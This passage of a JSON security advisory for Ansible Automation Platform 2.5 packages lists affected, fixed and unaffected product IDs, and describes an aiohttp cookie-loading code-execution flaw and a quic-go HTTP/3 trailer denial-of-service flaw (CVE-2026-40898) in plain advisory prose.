"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "aiohttp: AIOHTTP: Arbitrary code execution via untrusted input to CookieJar.load()"
},
{
"cve": "CVE-2026-40898",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-06-04T19:00:56.584166+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2484875"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in quic-go, an implementation of the QUIC protocol in Go. A remote attacker can exploit this by sending specially crafted HTTP/3 trailer fields. This can cause the system to allocate excessive memory, leading to a denial-of-service (DoS) condition where the affected server or client may crash or run out of resources.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "github.com/quic-go/quic-go: quic-go: Denial of Service via excessive memory allocation in HTTP/3 trailers",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important denial-of-service flaw in `quic-go` that allows a remote attacker to exhaust system memory by sending specially crafted HTTP/3 trailer fields. This can lead to crashes or resource unavailability in affected Red Hat products utilizing `quic-go` for HTTP/3 communication, impacting both client and server implementations.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64"
],
"known_not_affected": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
